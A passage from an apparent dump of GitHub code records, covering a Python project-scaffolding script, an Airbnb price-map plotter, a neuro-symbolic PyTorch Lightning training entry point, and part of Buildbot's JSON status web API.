'.join(fkeys)))\n replacements = {}\n missed = []\n for fk in fkeys:\n try:\n val = vars(args)[fk]\n except KeyError:\n missed.append(fk)\n else:\n replacements[fk] = val\n logger.debug('replacements: {0}'.format(', '.join(['[{0}]: \"{1}\"'.format(k, v)\n for k, v in replacements.items()])))\n if 'pkgreadme' in missed:\n replacements['pkgreadme'] = os.path.basename(TEMPLATES['readme'])\n if 'project_name' in missed:\n replacements['project_name'] = os.path.basename(where)\n if 'classlicense' in missed:\n replacements['classlicense'] = LICENSES[args.license]['classifier']\n logger.debug(\"missed: {0}\".format(', '.join(missed)))\n logger.debug('read replacements from args')\n logger.debug(replacements)\n logger.debug('attemping replacements in {0}'.format(fn))\n logger.debug(t)\n logger.debug(replacements)\n t = t.format(**replacements)\n logger.debug(t)\n shutil.copy2(os.path.join(where, fn),\n os.path.join(where, '{0}.bak'.format(fn)))\n with open(os.path.join(where, fn), 'w') as f:\n f.write(t)\n try:\n new_fn = TEMPLATE_RENAMES[fn]\n except KeyError:\n pass\n else:\n os.rename(os.path.join(where, fn), os.path.join(where, new_fn))\n return(new_fn)\n return(fn)\n\n\n@arglogger\ndef make_subdir(where, git, dname, init, children):\n \"\"\"\n create a subdirectory\n \"\"\"\n logger = logging.getLogger(sys._getframe().f_code.co_name)\n target = os.path.join(where, 
dname)\n logger.debug('trying to make \"{0}\"'.format(target))\n try:\n os.makedirs(target)\n except OSError as e:\n if e.errno == errno.EEXIST and os.path.isdir(where):\n logger.critical(\n 'script run with directory creation, but {0} already exists'\n ''.format(target))\n sys.exit(1)\n if init:\n fn = '__init__.py'\n fp = os.path.join(target, fn)\n with open(fp, 'w'):\n pass\n if git:\n git_it(target, fn, 'make {0} part of the package by adding '\n '__init__.py'.format(target))\n logger.info('instantiated {0} and committed it'.format(fp))\n else:\n logger.info('instantiated {0}'.format(fp))\n for child in children:\n make_subdir(target, git, *child)\n\n\n@arglogger\ndef git_it(where, what, msg):\n \"\"\"\n add and commit something to the git repository\n \"\"\"\n cmd = 'git add {0} && git commit -m \"{1}\"'.format(what, msg)\n run(cmd, where)\n\n\n@arglogger\ndef run(cmd, where=None, check=True):\n \"\"\"\n use subprocess to execute a desired command in the shell\n \"\"\"\n logger = logging.getLogger(sys._getframe().f_code.co_name)\n run_params = [\n 'bash',\n '-c',\n '. ~/.bash_profile'\n ]\n if where is not None:\n run_params[-1] += ' && cd {0}'.format(where)\n run_params[-1] += ' && {0}'.format(cmd)\n logger.debug('run_params: \\n {0}'.format('\\n '.join(run_params)))\n try:\n result = subprocess.run(\n run_params,\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n check=check).stdout\n except subprocess.CalledProcessError as e:\n logger.critical('subprocess execution failed with status code '\n '{0}:\\n '.format(e.returncode) +\n 'command was: \"{0}\\n \"'.format(run_params))\n\n\ndef fetch(targets, strip_yaml=False):\n \"\"\"\n fetch file(s) from url(s), concatenate, and save locally\n \"\"\"\n logger = logging.getLogger(sys._getframe().f_code.co_name)\n for target in targets:\n logger.debug('requesting {0}'.format(target[0]))\n r = requests.get(target[0], stream=True)\n if r.status_code == 200:\n # appending ensures we can aggregate, e.g., .gitignore content\n with open('{0}'.format(target[1]), 'ab') as f:\n r.raw.decode_content = True\n shutil.copyfileobj(r.raw, f)\n else:\n raise Exception('fetch of {0} failed with status code {1}'\n ''.format([0], r.status_code))\n sys.exit(1)\n logger.debug('successfully saved {0} as {1}'.format(*target))\n if strip_yaml:\n for target in targets:\n fp = target[1]\n post = frontmatter.load(fp)\n shutil.copy(fp, os.path.splitext(fp)[0] + '.bak')\n with open(fp, 'w') as f:\n f.write(post.content)\n logger.debug('removed yaml front matter from {0}'.format(fp))\n\n\nif __name__ == \"__main__\":\n log_level = DEFAULT_LOG_LEVEL\n log_level_name = logging.getLevelName(log_level)\n logging.basicConfig(level=log_level)\n\n try:\n parser = argparse.ArgumentParser(\n description=__doc__,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n for p in POSITIONAL_ARGUMENTS:\n d = {\n 'help': p[3]\n }\n if type(p[2]) == bool:\n if p[2] is False:\n d['action'] = 'store_true'\n d['default'] = False\n else:\n d['action'] = 'store_false'\n d['default'] = True\n else:\n d['default'] = p[2]\n parser.add_argument(\n p[0],\n p[1],\n **d)\n parser.add_argument(\n 'where',\n type=str,\n help='path to desired project directory')\n args = parser.parse_args()\n if args.loglevel is not None:\n args_log_level = re.sub('\\s+', '', args.loglevel.strip().upper())\n try:\n log_level = getattr(logging, args_log_level)\n except AttributeError:\n logging.error(\n \"command line option to set log_level failed \"\n \"because '%s' is not a valid level name; using %s\"\n % 
(args_log_level, log_level_name))\n if args.veryverbose:\n log_level = logging.DEBUG\n elif args.verbose:\n log_level = logging.INFO\n elif args.quiet:\n log_level = logging.CRITICAL\n log_level_name = logging.getLevelName(log_level)\n logging.getLogger().setLevel(log_level)\n fn_this = inspect.stack()[0][1].strip()\n title_this = __doc__.strip()\n logging.info(': '.join((fn_this, title_this)))\n if log_level != DEFAULT_LOG_LEVEL:\n logging.warning(\n \"logging level changed to %s via command line option\"\n % log_level_name)\n else:\n logging.info(\"using default logging level: %s\" % log_level_name)\n logging.debug(\"command line: '%s'\" % ' '.join(sys.argv))\n try:\n main(args)\n except ValueError as e:\n logging.critical(e)\n sys.exit(1)\n except NotImplementedError as e:\n logging.critical(e)\n sys.exit(1)\n sys.exit(0)\n except KeyboardInterrupt as e: # Ctrl-C\n raise e\n except SystemExit as e: # sys.exit()\n raise e\n except Exception as e:\n print(\"ERROR, UNEXPECTED EXCEPTION\")\n print(str(e))\n traceback.print_exc()\n os._exit(1)\n","repo_name":"paregorios/make-project","sub_path":"make.py","file_name":"make.py","file_ext":"py","file_size_in_byte":19534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25137667145","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 7 03:35:13 2018\n\nHeat map creator\n\n@Author: PouyaRZ\n\"\"\"\n\nimport numpy as np\nimport geopandas as gp\n#import geoplot\nimport pandas as pd\nfrom shapely.geometry import Point\nimport matplotlib.pyplot as plt\n\ngeojs = gp.read_file('../Data/neighbourhoods.geojson')\n\ndf = pd.read_csv('../Data/data_cleaned.csv')\ndf = df[['latitude','longitude','price']]\n\ndf['coords'] = list(zip(df.longitude, df.latitude))\ndf['coords'] = df['coords'].apply(Point)\ndf['price'] = np.exp(df['price'])\ndf = df[df['price']<=200]\n\n#df.drop('longitude','latitude')\n\n\ngdf = gp.GeoDataFrame(df, geometry='coords')\n\nbase = geojs.plot(color='white', edgecolor='black', linewidth = 1, figsize=(10,10))\n\ngdf.plot(ax=base, marker='o', column='price', markersize=1, legend=True)\n\nplt.xlabel('Longitude')\nplt.ylabel('Latitude')\nplt.title('NYC Airbnb Data Price Range')\n\nplt.savefig('Price_map.svg', bbox_inches='tight')","repo_name":"PouyaREZ/AirBnbPricePrediction","sub_path":"Main/Price_map_creator.py","file_name":"Price_map_creator.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"72"} +{"seq_id":"7198129777","text":"import torch\nimport torchvision\nimport pytorch_lightning as pl \nfrom pytorch_lightning.callbacks import ModelCheckpoint\n\nimport os \nimport argparse\nimport yaml \nimport pickle \n\n#.datasets import MNISTDataModule, EndToEndDataModule, EndToEndNoTestDataModule, ReasoningDataModule, fetch_perception_data\nfrom training import models, basic_models#BasicLSTM, MNISTModel, Neuroplytorch, ReasoningModel, MNISTWindow\nfrom data import data, datasets\n\ndef get_complex_parameters(complex_events_dict) -> tuple: \n ce_fsm_list, ce_time_list = [], [] \n for k in complex_events_dict.keys():\n complex_event = complex_events_dict[k]\n ce_fsm_list.append(torch.tensor(complex_event['PATTERN'])) \n max_time = [float('inf') if a=='INF' else a for a in complex_event['MAX_TIME']]\n ce_time_list.append(torch.tensor([max_time, complex_event['EVENTS_BETWEEN']]))\n \n return ce_fsm_list, ce_time_list\n \nif __name__==\"__main__\":\n parser = argparse.ArgumentParser() \n\n # 
This distinguishes between problems, i.e. the different scenarios, pattern parameters etc.\n    parser.add_argument('--name', dest='config_name', type=str, default='basic_neuro_experiment')\n    parser.add_argument('--logic', dest='check_logic', type=int, default=0) # if False, run end-to-end, if True run logic_check on reasoning layer\n\n    args = vars(parser.parse_args())\n\n    # TODO: on run, save the config file as hyperparameters for the logger\n    with open(f'./configs/{args[\"config_name\"]}.yaml') as file:\n        x = yaml.load(file, Loader=yaml.FullLoader)\n        training = x['TRAINING'] \n        complex_events = x['COMPLEX EVENTS']\n\n    ce_fsm_list, ce_time_list = get_complex_parameters(complex_events)\n    assert data.check_complex_parameters(ce_fsm_list, ce_time_list), \"Pattern and temporal metadata don't match, check the config file\"\n\n    MODULE_NAME = args['config_name']\n\n    # TODO: redo and double check these, make sure **kwargs are going in the right places etc. \n    perception_model_args = training['PERCEPTION']['PARAMETERS'].get('MODEL', {})\n    reasoning_model_args = training['REASONING']['PARAMETERS'].get('MODEL', {})\n    end_to_end_model_args = training['NEUROPLYTORCH']['PARAMETERS'].get('MODEL', {})\n\n    perception_dataset_args = training['PERCEPTION']['PARAMETERS'].get('DATASET', {})\n    reasoning_dataset_args = training['REASONING']['PARAMETERS'].get('DATASET', {})\n    end_to_end_dataset_args = training['NEUROPLYTORCH']['PARAMETERS'].get('DATASET', {})\n\n    perception_loss_str = training['PERCEPTION'].get('PRETRAIN', {}).get('LOSS_FUNCTION', 'MSELoss')\n    reasoning_loss_str = training['REASONING'].get('LOSS_FUNCTION', 'MSELoss')\n\n    pretrain_perception = training['PERCEPTION'].get('PRETRAIN', {}).get('PRETRAIN_PERCEPTION', False)\n    pretrain_num_epochs = training['PERCEPTION'].get('PRETRAIN', {}).get('PRETRAIN_EPOCHS', 10)\n\n    pretrain_lr = training['PERCEPTION'].get('PRETRAIN', {}).get('LEARNING_RATE', 0.001)\n    reasoning_lr = training['REASONING'].get('LEARNING_RATE', 0.001)\n\n    reasoning_epochs = training['REASONING']['EPOCHS']\n    reasoning_num_data = training['REASONING']['EPOCHS']\n\n    end_to_end_lr = training['NEUROPLYTORCH'].get('LEARNING_RATE', 0.001)\n    end_to_end_loss_str = training['NEUROPLYTORCH'].get('LOSS_FUNCTION', 'MSELoss')\n    end_to_end_epochs = training['NEUROPLYTORCH']['EPOCHS']\n    \n    no_test = end_to_end_dataset_args.get('no_test', True)\n\n    window_size = training.get('WINDOW_SIZE', 10)\n    num_primitive_events = training.get('NUM_PRIMITIVE_EVENTS', 10)\n    input_size = perception_model_args.pop('input_size', None)\n\n    use_gpu = int(torch.cuda.is_available())\n\n    \n\n    # fetch raw input data \n    x = [] \n    if training['DATASET']['TYPE']=='Pytorch Dataset':\n        x = datasets.fetch_perception_data(dataset_str=training['DATASET']['NAME'], dataset_loc=training['DATASET']['LOCATION'])\n    else:\n        x = datasets.fetch_perception_data_local(dataset_loc=training['DATASET']['LOCATION'], dataset_type=training['DATASET']['TYPE'], **perception_dataset_args)\n\n\n\n\n    # if pretrain_perception then train the perception model before attaching to Neuroplytorch, else leave untrained\n    perception_model = basic_models.get_model(training['PERCEPTION']['MODEL'])(input_size=input_size, output_size=num_primitive_events, **perception_model_args)\n    if input_size is None: perception_model = basic_models.get_model(training['PERCEPTION']['MODEL'])(output_size=num_primitive_events, **perception_model_args)\n    if pretrain_perception:\n        perception_data = 
datasets.get_datamodule(training['PERCEPTION']['PRETRAIN']['DATA_MODULE'])(data_dir=training['DATASET']['NAME'], **perception_dataset_args)\n model = models.get_model(training['PERCEPTION']['PRETRAIN']['MODEL_MODULE'])(loss_str=perception_loss_str, lr=pretrain_lr, **perception_model_args)\n trainer = pl.Trainer(max_epochs=pretrain_num_epochs, gpus=use_gpu, precision=16) \n trainer.fit(model, perception_data)\n\n perception_model = model.model\n\n perception_model = models.PerceptionWindow(perception_model=perception_model, window_size=window_size, num_primitive_events=num_primitive_events)\n\n\n\n\n # if a reasoning model already exists\n if os.path.exists(f'./models/reasoning/reasoning_model_{reasoning_loss_str}_{MODULE_NAME}.pt'):\n reasoning_model = models.ReasoningModel(input_size=num_primitive_events, output_size=len(ce_fsm_list), loss_str=reasoning_loss_str, lr=reasoning_lr)\n reasoning_model = reasoning_model.model\n reasoning_model.load_state_dict(torch.load(f'./models/reasoning/reasoning_model_{reasoning_loss_str}_{MODULE_NAME}.pt'))\n\n # otherwise synthesise data and train reasoning model separate from Neuroplytorch model\n else:\n reasoning_data = datasets.ReasoningDataModule(ce_fsm_list=ce_fsm_list, ce_time_list=ce_time_list, num_primitive_events=num_primitive_events, \n window_size=window_size, **reasoning_dataset_args)\n\n model = models.ReasoningModel(input_size=num_primitive_events, output_size=len(ce_fsm_list), loss_str=reasoning_loss_str, lr=reasoning_lr)\n trainer = pl.Trainer(max_epochs=reasoning_epochs, gpus=use_gpu, precision=16)\n\n trainer.fit(model, reasoning_data)\n trainer.test(model, reasoning_data)\n\n model.save_weights(f'./models/reasoning/reasoning_model_{reasoning_loss_str}_{MODULE_NAME}.pt')\n reasoning_model = model.model \n try: os.remove('curr_tmp_reasoning_model.pt')\n except Exception: pass \n\n\n\n\n if args['check_logic']:\n models.check_reasoning_logic(reasoning_model, ce_fsm_list, ce_time_list, num_primitive_events, window_size)\n\n else:\n\n # Push raw data with pattern parameters into an end-to-end dataset (NoTest implies the test set is used as validation)\n no_test_args = end_to_end_dataset_args.pop('no_test', True)\n end_data = datasets.EndToEndNoTestDataModule if no_test_args else datasets.EndToEndDataModule\n end_data = end_data(dataset=x, ce_fsm_list=ce_fsm_list, ce_time_list=ce_time_list, num_primitive_events=num_primitive_events, \n window_size=window_size, **end_to_end_dataset_args)\n\n # create a Neuroplytorch model from the reasoning model and perception model from previous and train\n end_model = models.Neuroplytorch(reasoning_model=reasoning_model, window_size=window_size, num_primitive_events=num_primitive_events,loss_str=end_to_end_loss_str, \n perception_model=perception_model, lr=end_to_end_lr)\n\n checkpoint_callback = ModelCheckpoint(\n monitor=\"val_loss\",\n dirpath=\"checkpoints\",\n filename=f\"{MODULE_NAME}\"+\"-{epoch:02d}-{val_loss:.2f}\",\n save_top_k=3,\n mode=\"min\",\n )\n\n trainer = pl.Trainer(max_epochs=end_to_end_epochs, gpus=use_gpu, precision=16)\n trainer.fit(end_model, end_data)\n\n end_model.save_model(f'models/neuroplytorch/{reasoning_loss_str}_{MODULE_NAME}')\n\n","repo_name":"dais-ita/Neuroplytorch","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8311,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"15457957791","text":"import collections\nimport datetime\nimport os\nimport re\n\nfrom twisted.internet import 
defer\nfrom twisted.web import html, resource, server\n\nfrom buildbot.status.web.base import HtmlResource\nfrom buildbot.util import json\n\n\n_IS_INT = re.compile('^[-+]?\d+$')\n\n\nFLAGS = \"\"\"\\\n  - as_text\n    - By default, application/json is used. Setting as_text=1 changes the type\n      to text/plain and implicitly sets compact=0 and filter=1. Mainly useful to\n      look at the result in a web browser.\n  - compact\n    - By default, the json data is compact and defaults to 1. For easier to read\n      indented output, set compact=0.\n  - select\n    - By default, most children data is listed. You can do a random selection\n      of data by using select= multiple times to coagulate data.\n      \"select=\" includes the actual url otherwise it is skipped.\n  - filter\n    - Filters out null, false, and empty string, list and dict. This reduces the\n      amount of useless data sent.\n  - callback\n    - Enables use of JSONP as described in\n      http://en.wikipedia.org/wiki/JSONP. Note that\n      Access-Control-Allow-Origin:* is set in the HTTP response header so you\n      can use this in compatible browsers.\n\"\"\"\n\nEXAMPLES = \"\"\"\\\n  - /json\n    - Root node, that *doesn't* mean all the data. Many things (like logs) must\n      be explicitly queried for performance reasons.\n  - /json/builders/\n    - All builders.\n  - /json/builders/<A_BUILDER>\n    - A specific builder as compact text.\n  - /json/builders/<A_BUILDER>/builds\n    - All *cached* builds.\n  - /json/builders/<A_BUILDER>/builds/_all\n    - All builds. Warning, reads all previous build data.\n  - /json/builders/<A_BUILDER>/builds/<A_BUILD>\n    - Where <A_BUILD> is either positive, a build number, or negative, a past\n      build.\n  - /json/builders/<A_BUILDER>/builds/-1/source_stamp/changes\n    - Build changes\n  - /json/builders/<A_BUILDER>/builds?select=-1&select=-2\n    - Two last builds on '<A_BUILDER>' builder.\n  - /json/builders/<A_BUILDER>/builds?select=-1/source_stamp/changes&select=-2/source_stamp/changes\n    - Changes of the two last builds on '<A_BUILDER>' builder.\n  - /json/builders/<A_BUILDER>/slaves\n    - Slaves associated with this builder.\n  - /json/builders/<A_BUILDER>?select=&select=slaves\n    - Builder information plus detailed information about its slaves. Neat eh?\n  - /json/slaves/<A_SLAVE>\n    - A specific slave.\n  - /json?select=slaves/<A_SLAVE>/&select=project&select=builders/<A_BUILDER>/builds/<A_BUILD>\n    - A selection of random unrelated stuff as a random example. 
:)\n\"\"\"\n\n\ndef RequestArg(request, arg, default):\n return request.args.get(arg, [default])[0]\n\n\ndef RequestArgToBool(request, arg, default):\n value = RequestArg(request, arg, default)\n if value in (False, True):\n return value\n value = value.lower()\n if value in ('1', 'true'):\n return True\n if value in ('0', 'false'):\n return False\n # Ignore value.\n return default\n\n\ndef FilterOut(data):\n \"\"\"Returns a copy with None, False, \"\", [], () and {} removed.\n Warning: converts tuple to list.\"\"\"\n if isinstance(data, (list, tuple)):\n # Recurse in every items and filter them out.\n items = map(FilterOut, data)\n if not filter(lambda x: not x in ('', False, None, [], {}, ()), items):\n return None\n return items\n elif isinstance(data, dict):\n return dict(filter(lambda x: not x[1] in ('', False, None, [], {}, ()),\n [(k, FilterOut(v)) for (k, v) in data.iteritems()]))\n else:\n return data\n\n\nclass JsonResource(resource.Resource):\n \"\"\"Base class for json data.\"\"\"\n\n contentType = \"application/json\"\n cache_seconds = 60\n help = None\n pageTitle = None\n level = 0\n\n def __init__(self, status):\n \"\"\"Adds transparent lazy-child initialization.\"\"\"\n resource.Resource.__init__(self)\n # buildbot.status.builder.Status\n self.status = status\n\n def getChildWithDefault(self, path, request):\n \"\"\"Adds transparent support for url ending with /\"\"\"\n if path == \"\" and len(request.postpath) == 0:\n return self\n if (path == \"help\" or path == \"help/\") and self.help:\n pageTitle = ''\n if self.pageTitle:\n pageTitle = self.pageTitle + ' help'\n res = HelpResource(self.help, pageTitle=pageTitle, parent_node=self)\n res.level = self.level + 1\n return res\n # Equivalent to resource.Resource.getChildWithDefault()\n if self.children.has_key(path):\n return self.children[path]\n return self.getChild(path, request)\n\n def putChild(self, name, res):\n \"\"\"Adds the resource's level for help links generation.\"\"\"\n\n def RecurseFix(res, level):\n res.level = level + 1\n for c in res.children.itervalues():\n RecurseFix(c, res.level)\n\n RecurseFix(res, self.level)\n resource.Resource.putChild(self, name, res)\n\n def render_GET(self, request):\n \"\"\"Renders a HTTP GET at the http request level.\"\"\"\n d = defer.maybeDeferred(lambda : self.content(request))\n def handle(data):\n if isinstance(data, unicode):\n data = data.encode(\"utf-8\")\n request.setHeader(\"Access-Control-Allow-Origin\", \"*\")\n if RequestArgToBool(request, 'as_text', False):\n request.setHeader(\"content-type\", 'text/plain')\n else:\n request.setHeader(\"content-type\", self.contentType)\n request.setHeader(\"content-disposition\",\n \"attachment; filename=\\\"%s.json\\\"\" % request.path)\n # Make sure we get fresh pages.\n if self.cache_seconds:\n now = datetime.datetime.utcnow()\n expires = now + datetime.timedelta(seconds=self.cache_seconds)\n request.setHeader(\"Expires\",\n expires.strftime(\"%a, %d %b %Y %H:%M:%S GMT\"))\n request.setHeader(\"Pragma\", \"no-cache\")\n return data\n d.addCallback(handle)\n def ok(data):\n request.write(data)\n request.finish()\n def fail(f):\n request.processingFailed(f)\n return None # processingFailed will log this for us\n d.addCallbacks(ok, fail)\n return server.NOT_DONE_YET\n\n @defer.deferredGenerator\n def content(self, request):\n \"\"\"Renders the json dictionaries.\"\"\"\n # Supported flags.\n select = request.args.get('select')\n as_text = RequestArgToBool(request, 'as_text', False)\n filter_out = RequestArgToBool(request, 
'filter', as_text)\n compact = RequestArgToBool(request, 'compact', not as_text)\n callback = request.args.get('callback')\n\n # Implement filtering at global level and every child.\n if select is not None:\n del request.args['select']\n # Do not render self.asDict()!\n data = {}\n # Remove superfluous /\n select = [s.strip('/') for s in select]\n select.sort(cmp=lambda x,y: cmp(x.count('/'), y.count('/')),\n reverse=True)\n for item in select:\n # Start back at root.\n node = data\n # Implementation similar to twisted.web.resource.getChildForRequest\n # but with a hacked up request.\n child = self\n prepath = request.prepath[:]\n postpath = request.postpath[:]\n request.postpath = filter(None, item.split('/'))\n while request.postpath and not child.isLeaf:\n pathElement = request.postpath.pop(0)\n node[pathElement] = {}\n node = node[pathElement]\n request.prepath.append(pathElement)\n child = child.getChildWithDefault(pathElement, request)\n\n # some asDict methods return a Deferred, so handle that\n # properly\n if hasattr(child, 'asDict'):\n wfd = defer.waitForDeferred(\n defer.maybeDeferred(lambda :\n child.asDict(request)))\n yield wfd\n child_dict = wfd.getResult()\n else:\n child_dict = {\n 'error' : 'Not available',\n }\n node.update(child_dict)\n\n request.prepath = prepath\n request.postpath = postpath\n else:\n wfd = defer.waitForDeferred(\n defer.maybeDeferred(lambda :\n self.asDict(request)))\n yield wfd\n data = wfd.getResult()\n\n if filter_out:\n data = FilterOut(data)\n if compact:\n data = json.dumps(data, sort_keys=True, separators=(',',':'))\n else:\n data = json.dumps(data, sort_keys=True, indent=2)\n if callback:\n # Only accept things that look like identifiers for now\n callback = callback[0]\n if re.match(r'^[a-zA-Z$][a-zA-Z$0-9.]*$', callback):\n data = '%s(%s);' % (callback, data)\n yield data\n\n @defer.deferredGenerator\n def asDict(self, request):\n \"\"\"Generates the json dictionary.\n\n By default, renders every childs.\"\"\"\n if self.children:\n data = {}\n for name in self.children:\n child = self.getChildWithDefault(name, request)\n if isinstance(child, JsonResource):\n wfd = defer.waitForDeferred(\n defer.maybeDeferred(lambda :\n child.asDict(request)))\n yield wfd\n data[name] = wfd.getResult()\n # else silently pass over non-json resources.\n yield data\n else:\n raise NotImplementedError()\n\n\ndef ToHtml(text):\n \"\"\"Convert a string in a wiki-style format into HTML.\"\"\"\n indent = 0\n in_item = False\n output = []\n for line in text.splitlines(False):\n match = re.match(r'^( +)\\- (.*)$', line)\n if match:\n if indent < len(match.group(1)):\n output.append('
<ul>')\n                indent = len(match.group(1))\n            elif indent > len(match.group(1)):\n                while indent > len(match.group(1)):\n                    output.append('</ul>')\n                    indent -= 2\n                if in_item:\n                    # Close previous item\n                    output.append('</li>')\n            output.append('<li>')\n            in_item = True\n            line = match.group(2)\n        elif indent:\n            if line.startswith((' ' * indent) + ' '):\n                # List continuation\n                line = line.strip()\n            else:\n                # List is done\n                if in_item:\n                    output.append('</li>')\n                    in_item = False\n                while indent > 0:\n                    output.append('</ul>')\n                    indent -= 2\n\n        if line.startswith('/'):\n            if not '?' in line:\n                line_full = line + '?as_text=1'\n            else:\n                line_full = line + '&as_text=1'\n            output.append('<a href=\"' + html.escape(line_full) + '\">' +\n                html.escape(line) + '</a>')\n        else:\n            output.append(html.escape(line).replace('  ', '&nbsp;&nbsp;'))\n        if not in_item:\n            output.append('<br>')\n\n    if in_item:\n        output.append('</li>')\n    while indent > 0:\n        output.append('</ul>')\n        indent -= 2\n    return '\\n'.join(output)\n\n\nclass HelpResource(HtmlResource):\n    def __init__(self, text, pageTitle, parent_node):\n        HtmlResource.__init__(self)\n        self.text = text\n        self.pageTitle = pageTitle\n        self.parent_level = parent_node.level\n        self.parent_children = parent_node.children.keys()\n\n    def content(self, request, cxt):\n        cxt['level'] = self.parent_level\n        cxt['text'] = ToHtml(self.text)\n        cxt['children'] = [ n for n in self.parent_children if n != 'help' ]\n        cxt['flags'] = ToHtml(FLAGS)\n        cxt['examples'] = ToHtml(EXAMPLES).replace(\n            'href=\"/json',\n            'href=\"%sjson' % (self.level * '../'))\n\n        template = request.site.buildbot_service.templates.get_template(\"jsonhelp.html\")\n        return template.render(**cxt)\n\nclass BuilderPendingBuildsJsonResource(JsonResource):\n    help = \"\"\"Describe pending builds for a builder.\n\"\"\"\n    pageTitle = 'Builder'\n\n    def __init__(self, status, builder_status):\n        JsonResource.__init__(self, status)\n        self.builder_status = builder_status\n\n    def asDict(self, request):\n        # buildbot.status.builder.BuilderStatus\n        d = self.builder_status.getPendingBuildRequestStatuses()\n        def to_dict(statuses):\n            return defer.gatherResults(\n                [ b.asDict_async() for b in statuses ])\n        d.addCallback(to_dict)\n        return d\n\n\nclass BuilderJsonResource(JsonResource):\n    help = \"\"\"Describe a single builder.\n\"\"\"\n    pageTitle = 'Builder'\n\n    def __init__(self, status, builder_status):\n        JsonResource.__init__(self, status)\n        self.builder_status = builder_status\n        self.putChild('builds', BuildsJsonResource(status, builder_status))\n        self.putChild('slaves', BuilderSlavesJsonResources(status,\n                                                           builder_status))\n        self.putChild(\n            'pendingBuilds',\n            BuilderPendingBuildsJsonResource(status, builder_status))\n\n    def asDict(self, request):\n        # buildbot.status.builder.BuilderStatus\n        return self.builder_status.asDict_async()\n\n\nclass BuildersJsonResource(JsonResource):\n    help = \"\"\"List of all the builders defined on a master.\n\"\"\"\n    pageTitle = 'Builders'\n\n    def __init__(self, status):\n        JsonResource.__init__(self, status)\n        for builder_name in self.status.getBuilderNames():\n            self.putChild(builder_name,\n                          BuilderJsonResource(status,\n                                              status.getBuilder(builder_name)))\n\n\nclass BuilderSlavesJsonResources(JsonResource):\n    help = \"\"\"Describe the slaves attached to a single builder.\n\"\"\"\n    pageTitle = 'BuilderSlaves'\n\n    def __init__(self, status, builder_status):\n        JsonResource.__init__(self, status)\n        self.builder_status = builder_status\n        for slave_name in self.builder_status.slavenames:\n            self.putChild(slave_name,\n                          SlaveJsonResource(status,\n                                            self.status.getSlave(slave_name)))\n\n\nclass BuildJsonResource(JsonResource):\n    help = \"\"\"Describe a single build.\n\"\"\"\n    pageTitle = 'Build'\n\n    def __init__(self, status, build_status):\n        JsonResource.__init__(self, status)\n        self.build_status = build_status\n        self.putChild('source_stamp',\n                      SourceStampJsonResource(status,\n                                              build_status.getSourceStamp()))\n        self.putChild('steps', BuildStepsJsonResource(status, build_status))\n\n    def asDict(self, request):\n        return self.build_status.asDict()\n\n\nclass AllBuildsJsonResource(JsonResource):\n    help = \"\"\"All the builds that were run on a builder.\n\"\"\"\n    pageTitle = 'AllBuilds'\n\n    def __init__(self, status, builder_status):\n        JsonResource.__init__(self, status)\n        self.builder_status = builder_status\n\n    def getChild(self, path, request):\n        # Dynamic childs.\n        if 
isinstance(path, int) or _IS_INT.match(path):\n build_status = self.builder_status.getBuild(int(path))\n if build_status:\n # Don't cache BuildJsonResource; that would defeat the cache-ing\n # mechanism in place for BuildStatus objects (in BuilderStatus).\n return BuildJsonResource(self.status, build_status)\n return JsonResource.getChild(self, path, request)\n\n def asDict(self, request):\n results = {}\n # If max is too big, it'll trash the cache...\n max = int(RequestArg(request, 'max',\n self.builder_status.buildCacheSize/2))\n for i in range(0, max):\n child = self.getChildWithDefault(-i, request)\n if not isinstance(child, BuildJsonResource):\n continue\n results[child.build_status.getNumber()] = child.asDict(request)\n return results\n\n\nclass BuildsJsonResource(AllBuildsJsonResource):\n help = \"\"\"Builds that were run on a builder.\n\"\"\"\n pageTitle = 'Builds'\n\n def __init__(self, status, builder_status):\n AllBuildsJsonResource.__init__(self, status, builder_status)\n self.putChild('_all', AllBuildsJsonResource(status, builder_status))\n\n def getChild(self, path, request):\n # Transparently redirects to _all if path is not ''.\n return self.children['_all'].getChildWithDefault(path, request)\n\n def asDict(self, request):\n # This would load all the pickles and is way too heavy, especially that\n # it would trash the cache:\n # self.children['builds'].asDict(request)\n # TODO(maruel) This list should also need to be cached but how?\n builds = dict([\n (int(file), None)\n for file in os.listdir(self.builder_status.basedir)\n if _IS_INT.match(file)\n ])\n return builds\n\n\nclass BuildStepJsonResource(JsonResource):\n help = \"\"\"A single build step.\n\"\"\"\n pageTitle = 'BuildStep'\n\n def __init__(self, status, build_step_status):\n # buildbot.status.buildstep.BuildStepStatus\n JsonResource.__init__(self, status)\n self.build_step_status = build_step_status\n # TODO self.putChild('logs', LogsJsonResource())\n\n def asDict(self, request):\n return self.build_step_status.asDict()\n\n\nclass BuildStepsJsonResource(JsonResource):\n help = \"\"\"A list of build steps that occurred during a build.\n\"\"\"\n pageTitle = 'BuildSteps'\n\n def __init__(self, status, build_status):\n JsonResource.__init__(self, status)\n self.build_status = build_status\n # The build steps are constantly changing until the build is done so\n # keep a reference to build_status instead\n\n def getChild(self, path, request):\n # Dynamic childs.\n build_step_status = None\n if isinstance(path, int) or _IS_INT.match(path):\n build_step_status = self.build_status.getSteps()[int(path)]\n else:\n steps_dict = dict([(step.getName(), step)\n for step in self.build_status.getSteps()])\n build_step_status = steps_dict.get(path)\n if build_step_status:\n # Create it on-demand.\n child = BuildStepJsonResource(self.status, build_step_status)\n # Cache it.\n index = self.build_status.getSteps().index(build_step_status)\n self.putChild(str(index), child)\n self.putChild(build_step_status.getName(), child)\n return child\n return JsonResource.getChild(self, path, request)\n\n def asDict(self, request):\n # Only use the number and not the names!\n results = {}\n index = 0\n for step in self.build_status.getSteps():\n results[index] = step.asDict()\n index += 1\n return results\n\n\nclass ChangeJsonResource(JsonResource):\n help = \"\"\"Describe a single change that originates from a change source.\n\"\"\"\n pageTitle = 'Change'\n\n def __init__(self, status, change):\n # buildbot.changes.changes.Change\n 
